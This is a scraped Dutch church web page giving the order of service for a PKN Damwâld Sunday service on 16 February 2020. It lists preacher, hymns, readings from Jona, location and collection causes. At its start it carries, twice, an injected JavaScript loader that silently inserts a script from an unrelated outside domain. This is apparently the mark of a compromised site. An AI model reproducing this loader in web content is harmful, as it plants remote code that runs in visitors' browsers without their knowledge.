;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 16 februari 2020 9:30 uur - PKN Damwâld
zondag 16 februari 2020
09:30 uur
KIK dienst (kinderen in de kerk) er is vandaag geen King Kids

Kerkdienst zondag 16 februari 2020 9:30 uur

Thema: Jona

Informatie

Voorganger:Ds. G.J. Otter
Organist:Anja van der Veen
Thema:Jona
Mededeling:KIK dienst (kinderen in de kerk) er is vandaag geen King Kids
Liturgie
Lied voor de dienst : NLB 100 : 1 en 4
Welkomstwoord
We zingen: NLB 75 : 1 en 2
Stilgebed, Votum en Groet
We zingen: Elb 166 : 1, 2 en 3
Wetslezing .
We zingen: Op toonhoogte 374
Gebed
We lezen: Jona 4
tekeningen uitdelen
We zingen: Elb 343 : 1, 3 en 4
Preek .
We zingen: NLB 836 : 1, 4 en 5
Dankgebed en voorbede
Collecte
Slotlied NLB 416 : 1, 2 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Werelddiaconaat Kameroen

Kameroen – Samen werken aan een stabiele toekomst
De noordelijke provincies van Kameroen liggen in de Sahel-zone: een regio met een grillig klimaat. Door lange periodes van extreme droogte rukt de woestijn op. Daarnaast telt de regio veel vluchtelingen, door onrust in de omliggende landen. Samen met lokale kerken en de inwoners van dit gebied werkt Kerk in Actie aan een stabiele toekomst. We ondersteunen boeren om via duurzame landbouw voldoende voedsel te verbouwen. Ook krijgen boeren training over veeteelt en waterbeheer. Tot slot bieden we noodzakelijke hulp aan vluchtelingen in de regio. Steun de bevolking in dit extreem kwetsbare gebied met uw collecte.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds